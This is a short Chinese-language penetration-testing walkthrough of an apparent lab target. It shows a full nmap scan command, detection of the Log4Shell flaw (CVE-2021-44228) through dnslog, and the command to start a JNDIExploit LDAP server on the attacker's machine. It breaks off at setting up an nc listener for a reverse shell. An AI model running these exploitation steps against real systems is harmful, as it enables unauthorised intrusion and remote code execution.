网络拓扑
信息搜集
渗透测试第一步当然是信息搜集
拿到 IP192.168.81.151我们先使用nmap对他进行常规TCP端口的扫描
nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151
发现开放了22,38080这两个端口
通过nmap我们可以得知这是一台Ubuntu,22是ssh,而38080这个端口是unknown的,我们尝试访问一下
于是尝试最近爆出的新漏洞 CVE-2021-44228 尝试看看能不能获取到 dnslog
发现存在 CVE-2021-44228漏洞,尝试去获取一个shell
CVE-2021-44228 利用
首先在我们的VPS kali(192.168.81.133) 开启一个LDAP:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133
然后在kali上nc监听9999端口: